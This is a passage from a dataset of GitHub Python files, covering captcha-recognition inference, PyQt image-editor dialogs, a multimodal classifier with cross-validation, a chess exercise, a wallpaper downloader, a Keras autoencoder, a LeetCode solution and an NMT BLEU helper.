4)[0]\n return ''.join([source[i] for i in output.cpu().numpy()])\n\n# img_path:包含多张图片的目录\ndef captchaByDir(img_dir):\n transforms = Compose([ToTensor()])\n dataset = CaptchaData(img_dir, transform=transforms)\n lable = []\n\n for k, (img, target) in enumerate(dataset):\n if torch.cuda.is_available():\n img = img.view(1, 3, 32, 120).cuda()\n else:\n img = img.view(1, 3, 32, 120)\n output = cnn(img)\n output = output.view(-1, 36)\n output = nn.functional.softmax(output, dim=1)\n output = torch.argmax(output, dim=1)\n output = output.view(-1, 4)[0]\n lable.append(''.join([source[i] for i in output.cpu().numpy()]))\n return lable\n","repo_name":"xHalo921/captcha","sub_path":"cnn_captcha.py","file_name":"cnn_captcha.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15005733292","text":"#!/usr/bin/env python\n#coding: utf-8\n\nimport os\n\nfrom PyQt4 import QtGui, QtCore\nfrom PyQt4.QtCore import Qt\n\n## Vista/View\nclass NewFileDialog(QtGui.QDialog):\n\t\"\"\"\n\tLa ventanita que se abre cuando queremos crear un archivo nuevo.\n\t\"\"\"\n\n\tdef __init__(self, data, Parent=None):\n\n\t\tsuper(NewFileDialog,self).__init__(Parent)\n\t\tself.data = data\n\t\tself.parent = Parent\n\n\t\tdimensionGroup = QtGui.QGroupBox(self.parent.data.getText(\"dialog_new_image\", \"dimension\"))\n\t\tdimensionLayout = QtGui.QVBoxLayout()\n\t\tself.width = QtGui.QSpinBox(dimensionGroup)\n\t\tself.width.setMinimum(1)\n\t\tself.width.setMaximum(4096)\n\t\tself.width.setValue(self.data.getIntDefault(\"new\", \"width\", 32))\n\t\tself.height = QtGui.QSpinBox(dimensionGroup)\n\t\tself.height.setMinimum(1)\n\t\tself.height.setMaximum(4096)\n\t\tself.height.setValue(self.data.getIntDefault(\"new\", \"height\", 32))\n\t\tdimensionLayout.addWidget(self.width)\n\t\tdimensionLayout.addWidget(self.height)\n\t\tdimensionGroup.setLayout(dimensionLayout)\n\n\t\tbackgroundGroup = QtGui.QGroupBox(self.parent.data.getText(\"dialog_new_image\", \"background\"))\n\t\tbackgroundLayout = QtGui.QVBoxLayout()\n\t\tself.r1 = QtGui.QRadioButton(self.parent.data.getText(\"dialog_new_image\", \"transparent\"))\n\t\tself.r1.setChecked(True)\n\t\tself.r2 = 
QtGui.QRadioButton(self.parent.data.getText(\"dialog_new_image\", \"color\"))\n\t\tself.cButton = QtGui.QPushButton()\n\t\tself.cButton.clicked.connect(self.getColor)\n\t\tself.cButton.setSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred)\n\t\tself.color = QtGui.QColor(255,255,255)\n\t\tself.cButton.setStyleSheet(\"background-color: \" + self.color.name() +\";\")\n\t\tself.cButton.setText(self.color.name())\n\t\tcolorLayout = QtGui.QHBoxLayout()\n\t\tcolorLayout.addWidget(self.r2)\n\t\tcolorLayout.addWidget(self.cButton)\n\t\tbackgroundLayout.addWidget(self.r1)\n\t\t#backgroundLayout.addWidget(r2)\n\t\tbackgroundLayout.addLayout(colorLayout)\n\t\tbackgroundGroup.setLayout(backgroundLayout)\n\n\t\tbuttonBox = QtGui.QDialogButtonBox(QtGui.QDialogButtonBox.Ok | QtGui.QDialogButtonBox.Cancel)\n\t\t#buttonBox.accepted.connect(self.accept)\n\t\tbuttonBox.accepted.connect(self.accept)\n\t\tbuttonBox.rejected.connect(self.reject)\n\t\tmainLayout = QtGui.QVBoxLayout()\n\t\tmainLayout.addWidget(dimensionGroup)\n\t\tmainLayout.addWidget(backgroundGroup)\n\t\tmainLayout.addWidget(buttonBox)\n\t\tself.setLayout(mainLayout)\n\t\tself.setWindowTitle(self.parent.data.getText(\"dialog_new_image\", \"title\"))\n\t\tself.initUI()\n\n\tdef initUI(self):\n\n\t\tself.show()\n\n\tdef getColor(self):\n\n\t\tself.color = QtGui.QColorDialog.getColor()\n\t\tif self.color.isValid(): \n\t\t\tself.r2.setChecked(True)\n\t\t\tself.cButton.setStyleSheet(\"background-color: \" + self.color.name() +\";\")\n\t\t\tself.cButton.setText(self.color.name())\n\n\tdef accept(self):\n\n\t\tif self.r1.isChecked():\n\t\t\tself.data.newImage(self.width.value(), self.height.value(), QtGui.QColor(0,0,0,0))\n\t\telse:\n\t\t\tself.data.newImage(self.width.value(), self.height.value(), self.color)\n\t\tself.data.setDefault(\"new\", \"width\", str(self.width.value()))\n\t\tself.data.setDefault(\"new\", \"height\", str(self.height.value()))\n\t\tsuper(NewFileDialog, self).accept()\n\n\nclass ResizeImageDialog (QtGui.QDialog):\n\n\tdef __init__(self, Parent=None):\n\n\t\tsuper(ResizeImageDialog, self).__init__(Parent)\n\n\t\tself.parent = Parent\n\n\t\tdimensionGroup = QtGui.QGroupBox(self.parent.data.getText(\"dialog_resize\", \"dimension\"))\n\t\tdimensionLayout = QtGui.QVBoxLayout()\n\n\t\tself.width = QtGui.QSpinBox(dimensionGroup)\n\t\tself.width.setMinimum(1)\n\t\tself.width.setMaximum(4096)\n\t\tself.width.setValue(Parent.data.image.width())\n\t\tself.height = QtGui.QSpinBox(dimensionGroup)\n\t\tself.height.setMinimum(1)\n\t\tself.height.setMaximum(4096)\n\t\tself.height.setValue(Parent.data.image.height())\n\n\t\tdimensionLayout.addWidget(self.width)\n\t\tdimensionLayout.addWidget(self.height)\n\t\tdimensionGroup.setLayout(dimensionLayout)\n\t\t\n\t\tbuttonBox = QtGui.QDialogButtonBox(QtGui.QDialogButtonBox.Ok | QtGui.QDialogButtonBox.Cancel)\n\t\tbuttonBox.accepted.connect(self.accept)\n\t\tbuttonBox.rejected.connect(self.reject)\n\n\t\tmainLayout = QtGui.QVBoxLayout()\n\t\tmainLayout.addWidget(dimensionGroup)\n\t\tmainLayout.addWidget(buttonBox)\n\n\t\tself.setLayout(mainLayout)\n\t\tself.setWindowTitle(self.parent.data.getText(\"dialog_resize\", \"title\"))\n\t\tself.show()\n\n\tdef accept(self):\n\t\n\t\tself.parent.data.resizeImage(self.width.value(), self.height.value())\n\t\tsuper(ResizeImageDialog,self).accept()\n\n\nclass ResizeCanvasDialog (QtGui.QDialog):\n\n\tdef __init__(self, Parent=None):\n\n\t\tsuper(ResizeCanvasDialog, self).__init__(Parent)\n\n\t\tself.parent = Parent\n\n\t\tdimensionGroup = 
QtGui.QGroupBox(self.parent.data.getText(\"dialog_resize_canvas\", \"dimension\"))\n\t\tdimensionLayout = QtGui.QVBoxLayout()\n\n\t\tself.width = QtGui.QSpinBox(dimensionGroup)\n\t\tself.width.setMinimum(1)\n\t\tself.width.setMaximum(1024)\n\t\tself.width.setValue(Parent.data.image.width())\n\t\tself.height = QtGui.QSpinBox(dimensionGroup)\n\t\tself.height.setMinimum(1)\n\t\tself.height.setMaximum(1024)\n\t\tself.height.setValue(Parent.data.image.height())\n\n\t\tdimensionLayout.addWidget(self.width)\n\t\tdimensionLayout.addWidget(self.height)\n\t\tdimensionGroup.setLayout(dimensionLayout)\n\t\t\n\t\tbuttonBox = QtGui.QDialogButtonBox(QtGui.QDialogButtonBox.Ok | QtGui.QDialogButtonBox.Cancel)\n\t\tbuttonBox.accepted.connect(self.accept)\n\t\tbuttonBox.rejected.connect(self.reject)\n\n\t\tmainLayout = QtGui.QVBoxLayout()\n\t\tmainLayout.addWidget(dimensionGroup)\n\t\tmainLayout.addWidget(buttonBox)\n\n\t\tself.setLayout(mainLayout)\n\t\tself.setWindowTitle(self.parent.data.getText(\"dialog_resize_canvas\", \"title\"))\n\t\tself.show()\n\n\tdef accept(self):\n\t\n\t\tself.parent.data.resizeCanvas(self.width.value(), self.height.value())\n\t\tsuper(ResizeCanvasDialog,self).accept()\n\n\nclass Preferences (QtGui.QDialog):\n\n\tdef __init__(self, data, com, Parent=None):\n\n\t\tsuper(Preferences, self).__init__(Parent)\n\t\tself.data = data\n\t\tself.com = com\n\t\tself.parent = Parent\n\n\t\t# El QStackedWidget es un tipo de widget muy útil que tiene diferentes \"páginas\" y podemos ir cambiando entre ellas\n\t\t# con sólo llamar a un método. En nuestro caso, conectamos el signal que emite el QListWidget al cambiar de sección\n\t\t# con el método self.changeCurrentView, que cambia la página del QStackedWidget.\n\n\t\tself.view = QtGui.QStackedWidget()\n\t\tself.view.addWidget(self.createLanguageView())\n\t\tself.view.addWidget(self.createUICustomizationView())\n\t\tself.view.addWidget(self.createMatrixGridView())\n\n\t\tself.preferences = QtGui.QListWidget()\n\t\tself.preferences.addItem(self.data.getText(\"dialog_preferences\", \"item_language\"))\n\t\tself.preferences.addItem(self.data.getText(\"dialog_preferences\", \"item_theme\"))\n\t\tself.preferences.addItem(self.data.getText(\"dialog_preferences\", \"item_matrix_grid\"))\n\t\tself.preferences.setCurrentRow(0)\n\t\tself.preferences.currentItemChanged.connect(self.changeCurrentView)\n\t\tself.preferences.setFixedWidth(self.preferences.sizeHintForColumn(0) + 24)\n\t\t#self.view.setFixedWidth(200)\n\n\t\tself.buttonBox = QtGui.QDialogButtonBox(QtGui.QDialogButtonBox.Ok | QtGui.QDialogButtonBox.Cancel)\n\t\tself.buttonBox.accepted.connect(self.accept)\n\t\tself.buttonBox.rejected.connect(self.reject)\n\n\t\tself.hbox = QtGui.QHBoxLayout()\n\t\tself.hbox.addWidget(self.preferences)\n\t\tself.hbox.addWidget(self.view)\n\n\t\tself.vbox = QtGui.QVBoxLayout()\n\t\tself.vbox.addLayout(self.hbox)\n\t\tself.vbox.addWidget(self.buttonBox)\n\n\t\tself.setLayout(self.vbox)\n\t\tself.setWindowTitle(self.data.getText(\"dialog_preferences\", \"title\"))\n\t\tself.adjustSize()\n\t\tself.show()\n\n\tdef changeCurrentView(self):\n\n\t\tself.view.setCurrentIndex(self.preferences.currentRow())\n\n\tdef createLanguageView(self):\n\n\t\t# Widget de ejemplo\n\n\t\tg = QtGui.QGroupBox(self.data.getText(\"dialog_preferences\", \"item_language_language\"))\n\n\t\tw = QtGui.QWidget()\n\n\t\tvbox = QtGui.QVBoxLayout()\n\n\t\tself.language = QtGui.QComboBox()\n\t\tself.langCodes = []\n\n\t\tj = 0\n\t\tfor i in 
self.data.tdatabase.d.keys():\n\t\t\tself.language.addItem(self.data.tdatabase.d[i].name)\n\t\t\tlangCode = self.data.tdatabase.d[i].code\n\t\t\tself.langCodes.append(langCode)\n\t\t\tif self.data.lang == langCode:\n\t\t\t\tself.language.setCurrentIndex(j)\n\t\t\tj += 1\n\n\t\tvbox.addWidget(self.language)\n\t\tvbox.setStretch(1,1)\n\t\tvbox.setAlignment(Qt.AlignTop)\n\n\t\tw.setLayout(vbox)\n\n\t\tg.setLayout(vbox)\n\n\t\treturn g\n\n\tdef createUICustomizationView(self):\n\n\t\tg = QtGui.QGroupBox(self.data.getText(\"dialog_preferences\", \"item_theme\"))\n\t\tw = QtGui.QWidget()\n\t\tvbox = QtGui.QVBoxLayout()\n\t\thbox = QtGui.QHBoxLayout()\n\n\t\tself.theme = QtGui.QComboBox()\n\n\t\tj = 0\n\t\tself.themeDirs = [d for d in os.listdir(\"themes\") if os.path.isdir(os.path.join(\"themes\", d))]\n\t\tfor i in self.themeDirs:\n\t\t\tself.theme.addItem(i)\n\t\t\tif self.data.theme == i:\n\t\t\t\tself.theme.setCurrentIndex(j)\n\t\t\tj += 1\n\t\tself.theme.setSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Preferred)\n\t\t#self.theme.setFixedWidth(self.theme.sizeHint().width())\n\n\t\thbox.addWidget(QtGui.QLabel(self.data.getText(\"dialog_preferences\", \"item_theme_theme\")))\n\t\thbox.addWidget(self.theme)\n\t\thbox.setAlignment(Qt.AlignLeft)\n\t\tvbox.addLayout(hbox)\n\n\t\tvbox.setStretch(1,1)\n\t\tvbox.setAlignment(Qt.AlignTop)\n\n\t\tw.setLayout(vbox)\n\t\tg.setLayout(vbox)\n\n\t\treturn g\n\n\tdef createMatrixGridView(self):\n\n\t\tg = QtGui.QGroupBox(self.data.getText(\"dialog_preferences\", \"item_matrix_grid_dimension\"))\n\n\t\tvbox = QtGui.QVBoxLayout()\n\t\t\n\t\tself.matrixGridWidth = QtGui.QSpinBox()\n\t\tself.matrixGridWidth.setMinimum(1)\n\t\tself.matrixGridWidth.setMaximum(1024)\n\t\tself.matrixGridWidth.setValue(self.data.matrixGridWidth)\n\t\tself.matrixGridHeight = QtGui.QSpinBox()\n\t\tself.matrixGridHeight.setMinimum(1)\n\t\tself.matrixGridHeight.setMaximum(1024)\n\t\tself.matrixGridHeight.setValue(self.data.matrixGridHeight)\n\n\t\tvbox.addWidget(self.matrixGridWidth)\n\t\tvbox.addWidget(self.matrixGridHeight)\n\t\tvbox.setStretch(1,1)\n\t\tvbox.setAlignment(Qt.AlignTop)\n\n\t\tg.setLayout(vbox)\n\n\t\treturn g\n\n\tdef accept(self):\n\n\t\tif self.langCodes[self.language.currentIndex()] != self.data.lang:\n\t\t\tQtGui.QMessageBox.information(self, self.data.getText(\"dialog_preferences\", \"item_language_changed_title\"), self.data.getText(\"dialog_preferences\", \"item_language_changed_message\"))\n\t\tself.data.setDefault(\"language\", \"lang\", self.langCodes[self.language.currentIndex()])\n\n\t\tself.data.matrixGridWidth = self.matrixGridWidth.value()\n\t\tself.data.setDefault(\"grid\", \"matrix_grid_width\", self.data.matrixGridWidth)\n\t\tself.data.matrixGridHeight = self.matrixGridHeight.value()\n\t\tself.data.setDefault(\"grid\", \"matrix_grid_height\", self.data.matrixGridHeight)\n\n\t\tif self.data.getDefault(\"theme\", \"theme\", \"aquamarine\") != self.themeDirs[self.theme.currentIndex()]:\n\t\t\tQtGui.QMessageBox.information(self, self.data.getText(\"dialog_preferences\", \"item_theme_changed_title\"), self.data.getText(\"dialog_preferences\", \"item_theme_changed_message\"))\n\t\tself.data.setDefault(\"theme\", \"theme\", self.themeDirs[self.theme.currentIndex()])\n\n\t\tself.com.updateCanvas.emit()\n\t\tsuper(Preferences, 
self).accept()","repo_name":"MikiLoz92/pixs2pics","sub_path":"dialogs.py","file_name":"dialogs.py","file_ext":"py","file_size_in_byte":10804,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18183895602","text":"import json\nimport glob\nimport pickle as pkl\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.io\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn import svm, tree\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom imblearn.ensemble import RUSBoostClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.preprocessing import normalize, scale\nfrom scipy.cluster.vq import whiten\nfrom imblearn.over_sampling import SMOTE, SVMSMOTE\nfrom sklearn.manifold import TSNE\nfrom sklearn.model_selection import StratifiedKFold\n\n\ndef choose_modality(linguistic_features, visual_features, audio_features, mod='all'):\n if mod == 'l':\n return np.concatenate([linguistic_features], axis=1)\n elif mod == 'a':\n return np.concatenate([audio_features], axis=1)\n elif mod == 'v':\n return np.concatenate([visual_features], axis=1)\n elif mod == 'la':\n return np.concatenate([linguistic_features, audio_features], axis=1)\n elif mod == 'lv':\n return np.concatenate([linguistic_features, visual_features], axis=1)\n elif mod == 'av':\n return np.concatenate([audio_features, visual_features], axis=1)\n elif mod == 'all':\n return np.concatenate([linguistic_features, visual_features, audio_features], axis=1)\n else:\n print('ha?')\n exit()\n\n\n# load data\nfileNameList = glob.glob('processed_features_facenet/*.pkl')\nprint(fileNameList)\n\ntext_list = []\nlabels = []\nvisual_features = []\naudio_features = []\nau_features = []\nfor file_name in fileNameList:\n data_point = pkl.load(open(file_name, 'rb'))\n clip_name, label, transcription, smoothed_seq = data_point[0], data_point[1], data_point[2], data_point[3]\n au_file = 'processed_features/' + file_name.split('\\\\')[1]\n au = pkl.load(open(au_file, 'rb'))\n\n _, _, _, smoothed_seq_au = au[0], au[1], au[2], au[3]\n\n labels.append(label)\n text_list.append(transcription)\n # average visual features\n au_seq = np.stack([w['landmark_feature'] for w in smoothed_seq_au], axis=0)\n visual_seq = np.stack([w['facenet_feature'] for w in smoothed_seq], axis=0)\n\n visual_mean = np.mean(visual_seq, axis=0)\n au_mean = np.mean(au_seq, axis=0)\n visual_features.append(visual_mean)\n au_features.append(au_mean)\n # average audio features\n audio_seq = np.stack([w['audio_grp'] for w in smoothed_seq], axis=0)\n\n audio_mean = np.mean(audio_seq, axis=0)\n audio_features.append(audio_mean)\n\n# print(text_list)\nvectorizer = TfidfVectorizer(min_df=5)\ndocMatrix = vectorizer.fit_transform(text_list)\n\nlinguistic_features = docMatrix.toarray()\nlinguistic_features = scale(linguistic_features)\n# print(linguistic_features)\n\nvisual_features = np.array(visual_features).squeeze()\n# visual_features = scale(visual_features)\n# visual_features = normalize(visual_features)\nau_features = scale(np.array(au_features).squeeze())\nvisual_features = np.concatenate((visual_features, au_features), axis=-1)\n# visual_features = au_features\nvisual_features = normalize(visual_features)\nvisual_features = 
scale(visual_features)\n# print(visual_features)\naudio_features = np.array(audio_features)\n# audio_features = scale(audio_features)\n# print(audio_features)\nlabels = np.array(labels)\n\n# linguistic_features = normalize(linguistic_features)\n\nfull_data = choose_modality(linguistic_features, visual_features, audio_features, mod='all')\n\nprint(full_data.shape)\n\n# full_data = normalize(full_data)\n# full_data = scale(full_data)\n\nperm = np.random.permutation(len(full_data))\nfull_data = full_data[perm]\nlabels = np.array(labels)[perm]\n\n# initialize cv5\nskf = StratifiedKFold(n_splits=5)\ncv5_ids = list(skf.split(full_data, labels))\n# print(cv5_ids)\n\n# initialize model\n# lin_clf = svm.SVC(decision_function_shape='ovo', probability=True)\n# lin_clf = svm.LinearSVC()\n# lin_clf = LogisticRegression()\n# lin_clf = svm.SVC(kernel='sigmoid')\n# lin_clf = MLPClassifier((256,256), activation='relu', max_iter=1000)\n# lin_clf = RandomForestClassifier(n_estimators=5000, max_depth=2, random_state=0)\nsingle_clf = tree.DecisionTreeClassifier(max_depth=1)\n# single_clf = LogisticRegression()\nlin_clf = RUSBoostClassifier(base_estimator=single_clf, n_estimators=5000)\n\n# initialize booster\nsm = SMOTE(random_state=42)\n\n# perform cv5\nprecision_avg = []\nrecall_avg = []\nfscore_avg = []\nacc_avg = 0.\nfor sp in cv5_ids:\n train_data, train_labels = full_data[sp[0]], labels[sp[0]]\n # train_data, train_labels = sm.fit_sample(train_data, train_labels)\n test_data, test_labels = full_data[sp[1]], labels[sp[1]]\n\n lin_clf.fit(train_data, train_labels)\n pred = lin_clf.predict(test_data)\n print(sp[1])\n print(pred)\n print(test_labels)\n # metrics\n precision, recall, fscore, support = precision_recall_fscore_support(test_labels, pred, labels=[0, 1, 2],\n average=None)\n acc = float(sum(pred == test_labels)) / len(test_labels)\n print(precision, recall, fscore, support, acc)\n precision_avg.append(precision)\n recall_avg.append(recall)\n fscore_avg.append(fscore)\n acc_avg += acc\nprecision, recall, fscore = np.mean(precision_avg, axis=0), np.mean(recall_avg, axis=0), np.mean(fscore_avg, axis=0)\nacc_avg = acc_avg / len(cv5_ids)\nprint('cv5-avg:')\nprint(precision, recall, fscore, acc_avg)\n\n","repo_name":"FlamingHorizon/MORSE","sub_path":"cv5.py","file_name":"cv5.py","file_ext":"py","file_size_in_byte":5587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26941362764","text":"pawns = {\"b4\", \"d4\", \"f4\", \"c3\", \"e3\", \"g5\", \"d2\"}\r\npawns = {\"b4\", \"c4\", \"d4\", \"e4\", \"f4\", \"g4\", \"e5\"}\r\npawns = {\"a1\", \"b2\", \"c3\", \"d4\", \"e5\", \"f6\", \"g7\", \"h8\"}\r\n\r\ndef check_pawns(pawns):\r\n pawn_list = []\r\n unsafe_pawns = []\r\n safe_pawns = []\r\n # decode to position\r\n for pawn in pawns:\r\n print(\"handling \"+str(pawn))\r\n file, rank = pawn[0], int(pawn[1])\r\n pawn_list.append((rank, file))\r\n print(pawn_list)\r\n\r\n for pawn in pawn_list:\r\n ok_flag = False\r\n rank, file = pawn[0], pawn[1]\r\n print(\"checking \"+file+str(rank))\r\n\r\n if rank == 1:\r\n unsafe_pawns.append(pawn)\r\n continue\r\n\r\n chk_rank = rank - 1\r\n chk_file1 = chr(ord(file)+1)\r\n if(chk_file1 > 'h'):\r\n chk_file1 = False\r\n chk_file2 = chr(ord(file)-1)\r\n if(chk_file2 < 'a'):\r\n chk_file2 = False\r\n\r\n print(\"file=\"+file+\", chk_file1=\"+str(chk_file1)+\", chk_file2=\"+str(chk_file2))\r\n\r\n for one_pawn in pawn_list:\r\n if chk_file1:\r\n print(\"checking 1: \"+chk_file1+str(chk_rank)+\" with 
\"+str(one_pawn))\r\n if (chk_rank, chk_file1) == one_pawn:\r\n print(\"found: pawn=\"+str(pawn)+\" protected by \"+str((chk_file1, chk_rank)))\r\n safe_pawns.append(pawn)\r\n ok_flag = True\r\n break\r\n if chk_file2:\r\n print(\"checking 2: \"+chk_file2+str(chk_rank)+str(one_pawn))\r\n if (chk_rank, chk_file2) == one_pawn:\r\n print(\"found: pawn=\"+str(pawn)+\" protected by \"+str((chk_file2, chk_rank)))\r\n safe_pawns.append(pawn)\r\n ok_flag = True\r\n break\r\n if not ok_flag:\r\n unsafe_pawns.append(pawn)\r\n\r\n print(\"unsafe: \"+str(unsafe_pawns))\r\n print(\"safe: \"+str(safe_pawns))\r\n return len(safe_pawns)\r\n\r\nprint(check_pawns(pawns))","repo_name":"mititer/python-study","sub_path":"checkio-chess-pawns.py","file_name":"checkio-chess-pawns.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33193277797","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport os\r\nimport ctypes\r\n\r\n\r\ndef get_wall():\r\n main_url = \"https://wallpapersite.com\"\r\n\r\n url = main_url + \"/random-wallpapers/\"\r\n page_random = requests.get(url)\r\n content = BeautifulSoup(page_random.text, \"html.parser\")\r\n\r\n i = 0\r\n for link in content.find_all('a'):\r\n i += 1\r\n if i == 40:\r\n next_page = link.get('href')\r\n break\r\n\r\n url2 = main_url + next_page\r\n print(\"-------------------------------------------\")\r\n print(url2)\r\n page_rand_found = requests.get(url2)\r\n content_rand_found = BeautifulSoup(page_rand_found.text, \"html.parser\")\r\n j = 0\r\n for links in content_rand_found.find_all('a'):\r\n j += 1\r\n\r\n wallpaper_links = links.get('href')\r\n if \"1920x1080\" in wallpaper_links:\r\n wallpaper_page = wallpaper_links\r\n if \".jpg\" not in wallpaper_page:\r\n get_wall()\r\n break\r\n\r\n image_url = main_url + wallpaper_page\r\n print(\"-------------------------------------------\")\r\n print(image_url)\r\n r = requests.get(image_url, allow_redirects=True)\r\n open('image.jpg', 'wb').write(r.content)\r\n return\r\n\r\n\r\ndef set_wall():\r\n path = os.path.abspath(\"image.jpg\")\r\n ctypes.windll.user32.SystemParametersInfoW(20, 0, path, 0)\r\n print(\"Wallpaper Changed.\")\r\n return\r\n","repo_name":"HRitvik07/DesktopWallpaperSwitcher","sub_path":"GetWallpaper.py","file_name":"GetWallpaper.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9523992011","text":"from keras.layers import Dense\nfrom keras.models import Model\nfrom keras.datasets import mnist, cifar10\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom keras import initializers, layers\nfrom keras.layers import Input, Convolution2D, MaxPooling2D, UpSampling2D\n\n\n\ndef encoded(input_img,dim_factor):\n #input_shape=[28, 28, 1]\n #x = Dense(3072, activation='relu')(input_img)\n #x = Dense(1024, activation='relu')(input_img)\n #x = Dense(512, activation='relu')(x)\n #encoded = Dense(encoding_dim, activation='relu')(x)\n \n x = layers.Conv2D(filters=256, kernel_size=9, strides=1, padding='same', activation='relu', name='conv1')(input_img)\n \n x = Convolution2D(64, (3, 3), activation='relu', border_mode='same')(input_img)\n x = MaxPooling2D((2, 2), border_mode='same')(x)\n x = Convolution2D(32, (3, 3), activation='relu', border_mode='same')(x)\n x = MaxPooling2D((2, 2), border_mode='same')(x)\n \n encoded = Convolution2D(8*dim_factor, (3, 3), activation='relu', 
border_mode='same')(x)\n \n #encoded = MaxPooling2D((3, 3), border_mode='valid')(x)\n \n return encoded\n\ndef decoded(encoded,dim_factor):\n #x = Dense(512, activation='relu')(encoded)\n #x = Dense(1024, activation='relu')(x)\n #decoded = Dense(3072, activation='sigmoid')(x)\n \n x = Convolution2D(8*dim_factor, (3, 3), activation='relu', border_mode='same')(encoded)\n x = UpSampling2D((2, 2))(x)\n x = Convolution2D(3, (3, 3), activation='relu', border_mode='same')(x)\n x = UpSampling2D((2, 2))(x)\n #x = Convolution2D(3, 3, 3, activation='relu')(x)\n #x = UpSampling2D((2, 2))(x)\n decoded = Convolution2D(3, 3, 3, activation='sigmoid', border_mode='same')(x)\n \n return decoded\n\ndim_factor=6*2*2\nencoding_dim = 32*dim_factor\ninput_img = Input(shape=(32,32,3))\n#input_img = Input(shape=(3072,))\nencoded = encoded(input_img, dim_factor)\ndecoded = decoded(encoded, dim_factor)\nautoencoder = Model(input=input_img, output=decoded)\n\nautoencoder.compile(optimizer='adam', loss='binary_crossentropy')\n#autoencoder.load_weights('autoencoder.h5')\nautoencoder.summary()\n\n(x_train,y_train), (x_test,y_test) = cifar10.load_data() #mnist.load_data() #cifar10.load_data()\nx_train = x_train.astype('float32') / 255.\nx_test = x_test.astype('float32') / 255.\n#x_train = x_train.reshape((len(x_train), np.prod(x_train.shape[1:])))\n#x_test = x_test.reshape((len(x_test), np.prod(x_test.shape[1:])))\n\nx_train = x_train[:50000]\nx_test = x_test[:10000]\n\nfor j in range(10):\n autoencoder.fit(x_train, x_train,\n nb_epoch=50,\n batch_size=256,\n shuffle=True,\n validation_data=(x_test, x_test))\n\n autoencoder.save_weights('autoencoder_D'+str(dim_factor)+'{0:03d}.h5'.format(j))\n autoencoder.load_weights('autoencoder_D'+str(dim_factor)+'{0:03d}.h5'.format(j))\n\n# テスト画像を変換\n decoded_imgs = autoencoder.predict(x_test)\n\n n = 10\n#encoded_imgs=[]\n encoder = Model(input_img, encoded)\n encoded_imgs = encoder.predict(x_test[:n])\n\n plt.figure(figsize=(32, 12))\n for i in range(n):\n # オリジナルのテスト画像を表示\n ax = plt.subplot(3, n, i+1)\n plt.imshow(x_test[i].reshape(32,32,3))\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n ax = plt.subplot(3, n, i+1+2*n)\n plt.imshow(decoded_imgs[i].reshape(32, 32,3))\n ax = plt.subplot(3, n, i+1+n)\n plt.imshow(encoded_imgs[i].reshape(32*2,32*2,3))\n plt.axis('off')\n plt.savefig(\"./caps_figures/autoencoder\"+str(dim_factor)+\"{0:03d}.png\".format(j))\n \n\n plt.pause(3)\n plt.close()\n\n\"\"\"\n_________________________________________________________________\nLayer (type) Output Shape Param #\n=================================================================\ninput_1 (InputLayer) (None, 3072) 0\n_________________________________________________________________\ndense_1 (Dense) (None, 1024) 3146752\n_________________________________________________________________\ndense_2 (Dense) (None, 512) 524800\n_________________________________________________________________\ndense_3 (Dense) (None, 320) 164160\n_________________________________________________________________\ndense_4 (Dense) (None, 512) 164352\n_________________________________________________________________\ndense_5 (Dense) (None, 1024) 525312\n_________________________________________________________________\ndense_6 (Dense) (None, 3072) 3148800\n=================================================================\nTotal params: 7,674,176\nTrainable params: 7,674,176\nNon-trainable params: 
0\n_________________________________________________________________\n\"\"\"","repo_name":"MuAuan/AutoEncoder","sub_path":"AutoEncoder.py","file_name":"AutoEncoder.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2071088873","text":"#TLE at 56/57 test cases\nclass Solution(object):\n def minTotalDistance(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n if not grid or not grid[0]: \n return None\n m, n = len(grid), len(grid[0])\n \n def bfs(i,j):\n q = collections.deque([(i,j, 0)])\n while q: \n i, j, d = q.popleft()\n dist[i][j] += d\n for x, y in [(i+1,j), (i-1,j), (i,j+1), (i,j-1)]:\n if 0<=x\"\n for i in np_tens:\n cur_snt = transform_seq_to_sent(i, vcb)\n snts.append(cur_snt[:cur_snt.index(\"\") if end_snt in cur_snt else len(cur_snt)].split())\n return snts\n\ndef bleu_score(unscaled_logits, outputs, rev_chunk_batch_torch, vcb_id2word):\n hypothesis = transform_tensor_to_list_of_snts(outputs, vcb_id2word)\n reference = transform_tensor_to_list_of_snts(rev_chunk_batch_torch, vcb_id2word)\n reference = [[cur_ref] for cur_ref in reference]\n list_of_hypotheses = hypothesis\n list_of_references = reference\n return nltk.translate.bleu_score.corpus_bleu(list_of_references, list_of_hypotheses)\n# %%\n# src, tgt = bg.next()\n# bg.vocab.tgt.id2word[2]\n# tgt[0]\n#\n# # %%\n# enc = Encoder(len(bg.vocab.src), 4, 5)\n# dec = Decoder(len(bg.vocab.tgt), enc.embedding, 4, 5)\n# a, b = bg.next()\n# a.data.shape\n# b.data.shape\n# all_hidden, all_cell = enc(a)\n# dec(all_hidden, all_cell, b, enc.batch_size)\n# %%\n\ntrain_batch_size = 128 # that was 200\neval_batch_size = 64\ntest_batch_size = 64\ndecode_batch_size = 8\n\nvocab_path=\"data/nmt_iwslt/vocab.bin\"\nbg = 